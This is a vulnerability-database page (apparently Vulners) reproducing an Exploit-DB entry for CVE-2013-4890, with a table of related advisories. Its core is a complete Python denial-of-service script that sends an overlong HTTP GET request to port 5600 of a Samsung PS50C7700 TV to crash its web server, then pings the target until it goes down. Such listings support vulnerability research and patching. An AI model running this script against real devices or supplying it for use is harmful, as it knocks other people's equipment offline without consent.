Lucene search
K

Samsung PS50C7700 TV - Denial of Service

🗓️ 23 Jul 2013 00:00:00Reported by Malik MesellemType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Samsung TV Denial of Service Attack on TC/560

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Samsung PS50C7700 TV - Denial of Service
23 Jul 201300:00
zdt
Check Point Advisories
Samsung PS50C7700 3D Plasma-TV Denial of Service (CVE-2013-4890)
13 Oct 201500:00
checkpoint_advisories
CVE
CVE-2013-4890
22 Jul 201319:00
cve
Cvelist
CVE-2013-4890
22 Jul 201319:00
cvelist
exploitpack
Samsung PS50C7700 TV - Denial of Service
23 Jul 201300:00
exploitpack
NVD
CVE-2013-4890
23 Jul 201311:03
nvd
Packet Storm
Samsung TV Denial Of Service
22 Jul 201300:00
packetstorm
Prion
Code injection
23 Jul 201311:03
prion
RedhatCVE
CVE-2013-4890
22 May 202511:14
redhatcve
securityvulns
Samsung TV DoS
29 Jul 201300:00
securityvulns
Rows per page
#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Date: 07/21/2013
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description: Resets some Samsung TVs
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   Tested successfully on my Samsung PS50C7700 plasma TV :)
 
import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description: Resets some Samsung TVs\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jul 2013 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 27.8
EPSS0.13481
40